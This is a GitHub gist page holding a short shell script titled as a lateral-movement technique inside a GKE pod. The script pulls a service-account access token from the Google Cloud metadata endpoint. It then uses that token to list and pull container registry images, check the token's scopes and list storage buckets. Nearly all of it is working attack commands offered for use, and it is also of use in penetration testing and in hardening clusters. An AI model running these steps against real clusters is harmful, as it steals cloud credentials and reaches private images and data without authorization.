-
-
Save pnigos/f214b675ca8cbe7609023ca10659b932 to your computer and use it in GitHub Desktop.
Lateral movement in GKE Pod using Cloud metadata endpoint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get temporary access token using Google Cloud instance metadata | |
| export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \ | |
| http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \ | |
| jq -r '.access_token') | |
| # List all repo from Google cloud registry using access token | |
| curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog | |
| # Docker login | |
| echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io | |
| # Pull image | |
| docker pull eu.gcr.io/<image-from-catalog> | |
| # Check scopes associated with default service account | |
| curl -H "Metadata-Flavor: Google" \ | |
| http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes | |
| # https://www.googleapis.com/auth/compute | |
| # https://www.googleapis.com/auth/devstorage.read_only | |
| # https://www.googleapis.com/auth/service.management | |
| # https://www.googleapis.com/auth/servicecontrol | |
| # https://www.googleapis.com/auth/logging.write | |
| # https://www.googleapis.com/auth/monitoring | |
| # https://www.googleapis.com/auth/devstorage.read_only can be used to access GCS buckets | |
| gsutil ls | |
| # Read more | |
| # https://cloud.google.com/storage/docs/authentication | |
| # https://cloud.google.com/container-registry/docs/advanced-authentication |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment